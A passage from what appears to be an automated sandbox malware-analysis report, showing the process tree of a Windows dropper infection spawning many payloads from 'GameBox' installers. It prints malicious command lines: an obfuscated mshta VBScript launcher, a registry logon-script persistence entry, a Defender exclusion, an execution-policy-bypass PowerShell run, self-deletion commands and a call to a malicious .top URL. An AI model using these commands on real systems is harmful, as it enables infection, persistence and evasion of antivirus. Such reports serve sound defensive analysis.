                                                                      PID:5912
                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                    "C:\Windows\System32\rundll32.exe" ~IWm4Wh.I,nKhkoYTFE
                                                                    6⤵
                                                                    • Loads dropped DLL
                                                                    PID:6068
                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                  taskkill -IM "XOd1WaOvuW6ilp3HB66v4806.exe" -f
                                                                  5⤵
                                                                  • Kills process with taskkill
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:3236
                                                          • C:\Users\Admin\Documents\SaEJK5wUPRJC1yUAaLB3owbq.exe
                                                            "C:\Users\Admin\Documents\SaEJK5wUPRJC1yUAaLB3owbq.exe"
                                                            2⤵
                                                            • Executes dropped EXE
                                                            PID:1440
                                                            • C:\Users\Admin\Documents\SaEJK5wUPRJC1yUAaLB3owbq.exe
                                                              "C:\Users\Admin\Documents\SaEJK5wUPRJC1yUAaLB3owbq.exe" -q
                                                              3⤵
                                                              • Executes dropped EXE
                                                              PID:4432
                                                          • C:\Users\Admin\Documents\uQvLzgQtbuyZqM2x_PDpWY9c.exe
                                                            "C:\Users\Admin\Documents\uQvLzgQtbuyZqM2x_PDpWY9c.exe"
                                                            2⤵
                                                            • Executes dropped EXE
                                                            PID:2460
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 2460 -s 476
                                                              3⤵
                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                              • Executes dropped EXE
                                                              • Suspicious use of SetThreadContext
                                                              • Program crash
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:3840
                                                          • C:\Users\Admin\Documents\GTCmlrUdttG60jriWUfnQrFC.exe
                                                            "C:\Users\Admin\Documents\GTCmlrUdttG60jriWUfnQrFC.exe"
                                                            2⤵
                                                            • Executes dropped EXE
                                                            PID:4476
                                                            • C:\Users\Admin\AppData\Local\Temp\is-32QCG.tmp\GTCmlrUdttG60jriWUfnQrFC.tmp
                                                              "C:\Users\Admin\AppData\Local\Temp\is-32QCG.tmp\GTCmlrUdttG60jriWUfnQrFC.tmp" /SL5="$201F6,138429,56832,C:\Users\Admin\Documents\GTCmlrUdttG60jriWUfnQrFC.exe"
                                                              3⤵
                                                              • Executes dropped EXE
                                                              • Loads dropped DLL
                                                              • Suspicious use of FindShellTrayWindow
                                                              PID:1892
                                                              • C:\Users\Admin\AppData\Local\Temp\is-JUQP5.tmp\Setup.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\is-JUQP5.tmp\Setup.exe" /Verysilent
                                                                4⤵
                                                                • Executes dropped EXE
                                                                • Drops file in Program Files directory
                                                                PID:5572
                                                                • C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe
                                                                  "C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
                                                                  5⤵
                                                                  • Loads dropped DLL
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:472
                                                                  • C:\Users\Admin\AppData\Local\Temp\is-QDRPF.tmp\Inlog.tmp
                                                                    "C:\Users\Admin\AppData\Local\Temp\is-QDRPF.tmp\Inlog.tmp" /SL5="$201F2,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
                                                                    6⤵
                                                                    • Loads dropped DLL
                                                                    • Suspicious use of FindShellTrayWindow
                                                                    PID:4840
                                                                    • C:\Users\Admin\AppData\Local\Temp\is-9CATG.tmp\Setup.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\is-9CATG.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                                                      7⤵
                                                                        PID:7520
                                                                        • C:\Users\Admin\AppData\Local\Temp\is-SO2VJ.tmp\Setup.tmp
                                                                          "C:\Users\Admin\AppData\Local\Temp\is-SO2VJ.tmp\Setup.tmp" /SL5="$202E4,17339287,721408,C:\Users\Admin\AppData\Local\Temp\is-9CATG.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                                                          8⤵
                                                                          • Loads dropped DLL
                                                                          • Drops file in Program Files directory
                                                                          • Suspicious use of FindShellTrayWindow
                                                                          PID:1648
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            "cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-K2C3L.tmp\{app}\microsoft.cab -F:* %ProgramData%
                                                                            9⤵
                                                                              PID:8036
                                                                              • C:\Windows\SysWOW64\expand.exe
                                                                                expand C:\Users\Admin\AppData\Local\Temp\is-K2C3L.tmp\{app}\microsoft.cab -F:* C:\ProgramData
                                                                                10⤵
                                                                                • Drops file in Windows directory
                                                                                PID:6140
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              "cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                                              9⤵
                                                                                PID:948
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f
                                                                                  10⤵
                                                                                    PID:8696
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  "cmd.exe" /c start http://afleof21klg.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^&param=721
                                                                                  9⤵
                                                                                  • Checks computer location settings
                                                                                  PID:8316
                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    10⤵
                                                                                      PID:5972
                                                                                  • C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe
                                                                                    "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"
                                                                                    9⤵
                                                                                    • Loads dropped DLL
                                                                                    PID:8692
                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-K2C3L.tmp\{app}\vdi_compiler.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-K2C3L.tmp\{app}\vdi_compiler"
                                                                                    9⤵
                                                                                      PID:6716
                                                                            • C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe
                                                                              "C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet
                                                                              5⤵
                                                                              • Executes dropped EXE
                                                                              • Loads dropped DLL
                                                                              • Enumerates connected drives
                                                                              • Suspicious use of FindShellTrayWindow
                                                                              PID:5976
                                                                              • C:\Windows\SysWOW64\msiexec.exe
                                                                                "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629555817 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"
                                                                                6⤵
                                                                                  PID:8672
                                                                              • C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe
                                                                                "C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
                                                                                5⤵
                                                                                • Executes dropped EXE
                                                                                PID:5516
                                                                                • C:\Users\Admin\AppData\Local\Temp\is-GGCN2.tmp\WEATHER Manager.tmp
                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-GGCN2.tmp\WEATHER Manager.tmp" /SL5="$203B4,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
                                                                                  6⤵
                                                                                  • Loads dropped DLL
                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                  PID:5792
                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-6B4KT.tmp\Setup.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-6B4KT.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=715
                                                                                    7⤵
                                                                                      PID:7192
                                                                                      • C:\Windows\SysWOW64\msiexec.exe
                                                                                        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-6B4KT.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-6B4KT.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629555817 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"
                                                                                        8⤵
                                                                                          PID:7160
                                                                                  • C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe
                                                                                    "C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"
                                                                                    5⤵
                                                                                    • Executes dropped EXE
                                                                                    • Checks computer location settings
                                                                                    PID:632
                                                                                    • C:\Users\Admin\Documents\7cZr6vw4nSUdtiQjkKzjT3o0.exe
                                                                                      "C:\Users\Admin\Documents\7cZr6vw4nSUdtiQjkKzjT3o0.exe"
                                                                                      6⤵
                                                                                        PID:6824
                                                                                        • C:\Users\Admin\Documents\7cZr6vw4nSUdtiQjkKzjT3o0.exe
                                                                                          "C:\Users\Admin\Documents\7cZr6vw4nSUdtiQjkKzjT3o0.exe" -q
                                                                                          7⤵
                                                                                            PID:5964
                                                                                        • C:\Users\Admin\Documents\1waunfpfUl_64bfMNl13pDKT.exe
                                                                                          "C:\Users\Admin\Documents\1waunfpfUl_64bfMNl13pDKT.exe"
                                                                                          6⤵
                                                                                            PID:5664
                                                                                            • C:\Users\Admin\Documents\1waunfpfUl_64bfMNl13pDKT.exe
                                                                                              "C:\Users\Admin\Documents\1waunfpfUl_64bfMNl13pDKT.exe"
                                                                                              7⤵
                                                                                              • Modifies data under HKEY_USERS
                                                                                              PID:5040
                                                                                          • C:\Users\Admin\Documents\caBSCY8Pm66BomWV7kuMubw1.exe
                                                                                            "C:\Users\Admin\Documents\caBSCY8Pm66BomWV7kuMubw1.exe"
                                                                                            6⤵
                                                                                              PID:5216
                                                                                              • C:\Users\Admin\AppData\Roaming\8506960.exe
                                                                                                "C:\Users\Admin\AppData\Roaming\8506960.exe"
                                                                                                7⤵
                                                                                                  PID:7928
                                                                                                • C:\Users\Admin\AppData\Roaming\4275979.exe
                                                                                                  "C:\Users\Admin\AppData\Roaming\4275979.exe"
                                                                                                  7⤵
                                                                                                  • Suspicious behavior: SetClipboardViewer
                                                                                                  PID:6284
                                                                                                • C:\Users\Admin\AppData\Roaming\1126607.exe
                                                                                                  "C:\Users\Admin\AppData\Roaming\1126607.exe"
                                                                                                  7⤵
                                                                                                    PID:7376
                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      8⤵
                                                                                                        PID:7272
                                                                                                    • C:\Users\Admin\AppData\Roaming\6143430.exe
                                                                                                      "C:\Users\Admin\AppData\Roaming\6143430.exe"
                                                                                                      7⤵
                                                                                                        PID:5152
                                                                                                    • C:\Users\Admin\Documents\kAu59EdkGnFqQvE8Usqh8sZt.exe
                                                                                                      "C:\Users\Admin\Documents\kAu59EdkGnFqQvE8Usqh8sZt.exe"
                                                                                                      6⤵
                                                                                                      • Loads dropped DLL
                                                                                                      PID:4944
                                                                                                    • C:\Users\Admin\Documents\SYCdkx2Ve2qG5kK_v_FEVVDf.exe
                                                                                                      "C:\Users\Admin\Documents\SYCdkx2Ve2qG5kK_v_FEVVDf.exe"
                                                                                                      6⤵
                                                                                                      • Suspicious use of SetThreadContext
                                                                                                      PID:6624
                                                                                                      • C:\Users\Admin\Documents\SYCdkx2Ve2qG5kK_v_FEVVDf.exe
                                                                                                        C:\Users\Admin\Documents\SYCdkx2Ve2qG5kK_v_FEVVDf.exe
                                                                                                        7⤵
                                                                                                          PID:7852
                                                                                                        • C:\Users\Admin\Documents\SYCdkx2Ve2qG5kK_v_FEVVDf.exe
                                                                                                          C:\Users\Admin\Documents\SYCdkx2Ve2qG5kK_v_FEVVDf.exe
                                                                                                          7⤵
                                                                                                            PID:7996
                                                                                                        • C:\Users\Admin\Documents\m0gdqyc2wLOsMuCjpadhAin9.exe
                                                                                                          "C:\Users\Admin\Documents\m0gdqyc2wLOsMuCjpadhAin9.exe"
                                                                                                          6⤵
                                                                                                          • Loads dropped DLL
                                                                                                          PID:5248
                                                                                                        • C:\Users\Admin\Documents\J384gi6evTveqqEigexyknHq.exe
                                                                                                          "C:\Users\Admin\Documents\J384gi6evTveqqEigexyknHq.exe"
                                                                                                          6⤵
                                                                                                          • Suspicious use of SetThreadContext
                                                                                                          PID:7128
                                                                                                          • C:\Users\Admin\Documents\J384gi6evTveqqEigexyknHq.exe
                                                                                                            C:\Users\Admin\Documents\J384gi6evTveqqEigexyknHq.exe
                                                                                                            7⤵
                                                                                                              PID:7732
                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 7732 -s 24
                                                                                                                8⤵
                                                                                                                • Program crash
                                                                                                                PID:7956
                                                                                                          • C:\Users\Admin\Documents\CyMVZxAzhHyPydTnUo7H5VrX.exe
                                                                                                            "C:\Users\Admin\Documents\CyMVZxAzhHyPydTnUo7H5VrX.exe"
                                                                                                            6⤵
                                                                                                              PID:3992
                                                                                                            • C:\Users\Admin\Documents\cuo2NzzEHy8XLlU8Im4yqb3G.exe
                                                                                                              "C:\Users\Admin\Documents\cuo2NzzEHy8XLlU8Im4yqb3G.exe"
                                                                                                              6⤵
                                                                                                              • Checks SCSI registry key(s)
                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                              PID:6728
                                                                                                            • C:\Users\Admin\Documents\sTuAeZHR96UibBUal4h_Qkbw.exe
                                                                                                              "C:\Users\Admin\Documents\sTuAeZHR96UibBUal4h_Qkbw.exe"
                                                                                                              6⤵
                                                                                                              • Checks BIOS information in registry
                                                                                                              • Checks whether UAC is enabled
                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                              PID:6972
                                                                                                            • C:\Users\Admin\Documents\tYDG9wKjYMGBBHxOOUyyhIyP.exe
                                                                                                              "C:\Users\Admin\Documents\tYDG9wKjYMGBBHxOOUyyhIyP.exe"
                                                                                                              6⤵
                                                                                                              • Checks BIOS information in registry
                                                                                                              • Checks whether UAC is enabled
                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                              PID:988
                                                                                                            • C:\Users\Admin\Documents\Mm27bPs39y_HCMciRtIb_32L.exe
                                                                                                              "C:\Users\Admin\Documents\Mm27bPs39y_HCMciRtIb_32L.exe"
                                                                                                              6⤵
                                                                                                              • Suspicious use of SetThreadContext
                                                                                                              PID:6000
                                                                                                              • C:\Users\Admin\Documents\Mm27bPs39y_HCMciRtIb_32L.exe
                                                                                                                "C:\Users\Admin\Documents\Mm27bPs39y_HCMciRtIb_32L.exe"
                                                                                                                7⤵
                                                                                                                  PID:5736
                                                                                                              • C:\Users\Admin\Documents\w4LX9BfT4Gey3NNdiW2Xdeo4.exe
                                                                                                                "C:\Users\Admin\Documents\w4LX9BfT4Gey3NNdiW2Xdeo4.exe"
                                                                                                                6⤵
                                                                                                                • Checks BIOS information in registry
                                                                                                                • Checks whether UAC is enabled
                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                PID:2768
                                                                                                              • C:\Users\Admin\Documents\2pxol_gsl6T0eGhyVbiPv4EA.exe
                                                                                                                "C:\Users\Admin\Documents\2pxol_gsl6T0eGhyVbiPv4EA.exe"
                                                                                                                6⤵
                                                                                                                • Loads dropped DLL
                                                                                                                • Checks processor information in registry
                                                                                                                PID:7140
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  "C:\Windows\System32\cmd.exe" /c taskkill /im 2pxol_gsl6T0eGhyVbiPv4EA.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\2pxol_gsl6T0eGhyVbiPv4EA.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                  7⤵
                                                                                                                    PID:8692
                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                      taskkill /im 2pxol_gsl6T0eGhyVbiPv4EA.exe /f
                                                                                                                      8⤵
                                                                                                                      • Kills process with taskkill
                                                                                                                      PID:8900
                                                                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                                                                      timeout /t 6
                                                                                                                      8⤵
                                                                                                                      • Delays execution with timeout.exe
                                                                                                                      PID:8096
                                                                                                                • C:\Users\Admin\Documents\2kz4S9UByHbh5dKass1yZRWX.exe
                                                                                                                  "C:\Users\Admin\Documents\2kz4S9UByHbh5dKass1yZRWX.exe"
                                                                                                                  6⤵
                                                                                                                    PID:1084
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1084 -s 216
                                                                                                                      7⤵
                                                                                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                      • Program crash
                                                                                                                      PID:4200
                                                                                                                  • C:\Users\Admin\Documents\Zl5tJTRzPC4SD4Fs2fMbpKMI.exe
                                                                                                                    "C:\Users\Admin\Documents\Zl5tJTRzPC4SD4Fs2fMbpKMI.exe"
                                                                                                                    6⤵
                                                                                                                      PID:4316
                                                                                                                    • C:\Users\Admin\Documents\cFNEpjDz94OPtzslqPBhiA23.exe
                                                                                                                      "C:\Users\Admin\Documents\cFNEpjDz94OPtzslqPBhiA23.exe"
                                                                                                                      6⤵
                                                                                                                        PID:7236
                                                                                                                        • C:\Windows\SysWOW64\mshta.exe
                                                                                                                          "C:\Windows\System32\mshta.exe" vbSCRipt: ClOSe( creATEoBJEcT ( "WscRIpT.sHEll" ). RUN ( "Cmd /Q /C tYPe ""C:\Users\Admin\Documents\cFNEpjDz94OPtzslqPBhiA23.exe"" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if """" == """" for %W iN ( ""C:\Users\Admin\Documents\cFNEpjDz94OPtzslqPBhiA23.exe"" ) do taskkill -IM ""%~nXW"" -f " ,0 , TRUE ) )
                                                                                                                          7⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          PID:5684
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            "C:\Windows\System32\cmd.exe" /Q /C tYPe "C:\Users\Admin\Documents\cFNEpjDz94OPtzslqPBhiA23.exe" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if "" =="" for %W iN ( "C:\Users\Admin\Documents\cFNEpjDz94OPtzslqPBhiA23.exe" ) do taskkill -IM "%~nXW" -f
                                                                                                                            8⤵
                                                                                                                              PID:5972
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe
                                                                                                                                WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9
                                                                                                                                9⤵
                                                                                                                                  PID:5368
                                                                                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                    "C:\Windows\System32\mshta.exe" vbSCRipt: ClOSe( creATEoBJEcT ( "WscRIpT.sHEll" ). RUN ( "Cmd /Q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe"" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if ""-PifOcLbay~PF~N8a_e9RyKpu9 "" == """" for %W iN ( ""C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe"" ) do taskkill -IM ""%~nXW"" -f " ,0 , TRUE ) )
                                                                                                                                    10⤵
                                                                                                                                      PID:8196
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        "C:\Windows\System32\cmd.exe" /Q /C tYPe "C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if "-PifOcLbay~PF~N8a_e9RyKpu9 " =="" for %W iN ( "C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe" ) do taskkill -IM "%~nXW" -f
                                                                                                                                        11⤵
                                                                                                                                          PID:5068
                                                                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                        "C:\Windows\System32\rundll32.exe" ~IWm4Wh.I,nKhkoYTFE
                                                                                                                                        10⤵
                                                                                                                                        • Loads dropped DLL
                                                                                                                                        PID:8856
                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                      taskkill -IM "cFNEpjDz94OPtzslqPBhiA23.exe" -f
                                                                                                                                      9⤵
                                                                                                                                      • Kills process with taskkill
                                                                                                                                      PID:948
                                                                                                                              • C:\Users\Admin\Documents\n6eajyeUjgMmIFetlil3Trts.exe
                                                                                                                                "C:\Users\Admin\Documents\n6eajyeUjgMmIFetlil3Trts.exe"
                                                                                                                                6⤵
                                                                                                                                  PID:7272
                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 7272 -s 664
                                                                                                                                    7⤵
                                                                                                                                    • Program crash
                                                                                                                                    PID:7740
                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 7272 -s 700
                                                                                                                                    7⤵
                                                                                                                                    • Program crash
                                                                                                                                    PID:8188
                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 7272 -s 672
                                                                                                                                    7⤵
                                                                                                                                    • Program crash
                                                                                                                                    PID:5356
                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 7272 -s 628
                                                                                                                                    7⤵
                                                                                                                                    • Program crash
                                                                                                                                    PID:7744
                                                                                                                                • C:\Users\Admin\Documents\GjIluqf3ILMpOo10hkvpVItX.exe
                                                                                                                                  "C:\Users\Admin\Documents\GjIluqf3ILMpOo10hkvpVItX.exe"
                                                                                                                                  6⤵
                                                                                                                                    PID:7196
                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      "C:\Windows\System32\cmd.exe" /c taskkill /im "GjIluqf3ILMpOo10hkvpVItX.exe" /f & erase "C:\Users\Admin\Documents\GjIluqf3ILMpOo10hkvpVItX.exe" & exit
                                                                                                                                      7⤵
                                                                                                                                        PID:7440
                                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                          8⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          PID:472
                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                          taskkill /im "GjIluqf3ILMpOo10hkvpVItX.exe" /f
                                                                                                                                          8⤵
                                                                                                                                          • Kills process with taskkill
                                                                                                                                          PID:6840
                                                                                                                                    • C:\Users\Admin\Documents\kN1pBJKcwlA4gvstGujk2Owi.exe
                                                                                                                                      "C:\Users\Admin\Documents\kN1pBJKcwlA4gvstGujk2Owi.exe"
                                                                                                                                      6⤵
                                                                                                                                      • Drops file in Program Files directory
                                                                                                                                      PID:7380
                                                                                                                                    • C:\Users\Admin\Documents\E87fH4n7FHwTNE5zAFOWsREr.exe
                                                                                                                                      "C:\Users\Admin\Documents\E87fH4n7FHwTNE5zAFOWsREr.exe"
                                                                                                                                      6⤵
                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                      PID:7564
                                                                                                                                      • C:\Users\Admin\Documents\E87fH4n7FHwTNE5zAFOWsREr.exe
                                                                                                                                        "C:\Users\Admin\Documents\E87fH4n7FHwTNE5zAFOWsREr.exe"
                                                                                                                                        7⤵
                                                                                                                                          PID:2784
                                                                                                                                      • C:\Users\Admin\Documents\a379w1j0rBMwdrXTFmwb7_6p.exe
                                                                                                                                        "C:\Users\Admin\Documents\a379w1j0rBMwdrXTFmwb7_6p.exe"
                                                                                                                                        6⤵
                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                        • Checks whether UAC is enabled
                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                        PID:7548
                                                                                                                                      • C:\Users\Admin\Documents\92fXXY1MfwWpSkLwTUvP9eDb.exe
                                                                                                                                        "C:\Users\Admin\Documents\92fXXY1MfwWpSkLwTUvP9eDb.exe"
                                                                                                                                        6⤵
                                                                                                                                          PID:7540
                                                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                            C:\Windows\system32\rundll32.exe C:\Users\Admin\DOCUME~1\92FXXY~1.DLL,s C:\Users\Admin\DOCUME~1\92FXXY~1.EXE
                                                                                                                                            7⤵
                                                                                                                                            • Blocklisted process makes network request
                                                                                                                                            • Loads dropped DLL
                                                                                                                                            PID:5272
                                                                                                                                            • C:\Windows\SysWOW64\RUNDLL32.EXE
                                                                                                                                              C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\92FXXY~1.DLL,Qy0WSjRNUlRJ
                                                                                                                                              8⤵
                                                                                                                                              • Blocklisted process makes network request
                                                                                                                                              • Checks processor information in registry
                                                                                                                                              • Modifies system certificate store
                                                                                                                                              PID:8744
                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\Users\Admin\DOCUME~1\92FXXY~1.DLL
                                                                                                                                                9⤵
                                                                                                                                                  PID:1840
                                                                                                                                                • C:\Windows\SysWOW64\RUNDLL32.EXE
                                                                                                                                                  C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\92FXXY~1.DLL,YlgJ
                                                                                                                                                  9⤵
                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                  • Checks processor information in registry
                                                                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                                                                  PID:9096
                                                                                                                                                  • C:\Windows\system32\rundll32.exe
                                                                                                                                                    C:\Windows\system32\rundll32.exe C:\Windows\system32\shell32.dll,#61 17897
                                                                                                                                                    10⤵
                                                                                                                                                      PID:5528
                                                                                                                                                      • C:\Windows\system32\ctfmon.exe
                                                                                                                                                        ctfmon.exe
                                                                                                                                                        11⤵
                                                                                                                                                          PID:8144
                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Executionpolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\tmp8F24.tmp.ps1"
                                                                                                                                                      9⤵
                                                                                                                                                        PID:5212
                                                                                                                                                • C:\Users\Admin\Documents\1du0NbejL1MSeLRUXMzS2zBp.exe
                                                                                                                                                  "C:\Users\Admin\Documents\1du0NbejL1MSeLRUXMzS2zBp.exe"
                                                                                                                                                  6⤵
                                                                                                                                                    PID:6664
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-2FJT4.tmp\1du0NbejL1MSeLRUXMzS2zBp.tmp
                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-2FJT4.tmp\1du0NbejL1MSeLRUXMzS2zBp.tmp" /SL5="$20540,138429,56832,C:\Users\Admin\Documents\1du0NbejL1MSeLRUXMzS2zBp.exe"
                                                                                                                                                      7⤵
                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                                                                      PID:5200
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-MUTR7.tmp\Setup.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-MUTR7.tmp\Setup.exe" /Verysilent
                                                                                                                                                        8⤵
                                                                                                                                                        • Drops file in Program Files directory
                                                                                                                                                        PID:3212
                                                                                                                                                        • C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe
                                                                                                                                                          "C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"
                                                                                                                                                          9⤵
                                                                                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                                                                                          • Suspicious use of SendNotifyMessage
                                                                                                                                                          PID:7200
                                                                                                                                                • C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe
                                                                                                                                                  "C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe"
                                                                                                                                                  5⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                                  PID:1304
                                                                                                                                                  • C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe
                                                                                                                                                    "C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe"
                                                                                                                                                    6⤵
                                                                                                                                                      PID:7436
                                                                                                                                                  • C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe
